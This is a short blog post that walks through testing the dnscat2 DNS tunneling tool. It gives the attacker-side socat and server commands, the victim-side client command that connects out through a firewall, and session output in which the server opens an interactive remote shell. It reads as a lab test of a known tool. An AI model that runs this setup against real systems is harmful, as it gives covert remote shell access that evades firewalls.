dnscat2

Introduction

Wanted to test dns tunneling and came across dnscat2.
Got a copy from https://github.com/iagox86/dnscat2
Tried it out and it worked.
My setup was dnscat2 linux client behind firewall connects outbound to dnscat2 server in AWS. Use socat to redirect udp packets from 53 to 5333. dnscat2 server requests shell on client and receives interactive shell.
Will certainly be using this again.

Update – more details

Start socat
socat redirect from port 53 to 5333

attacker$ sudo socat UDP4-RECVFROM:53,fork UDP4-SENDTO:localhost:5333

Install dnscat2 and run as non root
No domain name specified so this mode of dnscat2 will require clients to query our server directly.

attacker$ ruby ./dnscat2.rb --dnsport=5333 --secret=mysecret

Build and run dnscat2 client on linux

victim$ ./dnscat --dns=server=54.191.x.x --secret=mysecret

On the server side you should see the new session established

New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
dnscat2> sessions
0 :: main [active]
 crypto-debug :: Debug window for crypto stuff [*]
 dns1 :: DNS Driver running on 0.0.0.0:5333 domains = [*]
 1 :: command (kali) [encrypted and verified] [*] [idle for 19 seconds]

Then to start an interactive os shell issue the shell command from the initial session 1

dnscat2> session -i 1
New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a command session!

That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.

Run the shell command

command (kali) 1> shell
Sent request to execute a shell
command (kali) 1> New window created: 2
Shell session created!

Connect to the new session 2

command (kali) 1> session -i 2
New window created: 2
history_size (session) => 1000
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!

That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!

To go back, type ctrl-z.

Now you can issue shell commands

sh (kali) 2> id
sh (kali) 2> uid=1000(bob) gid=1001(bob) groups=1001(bob)

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s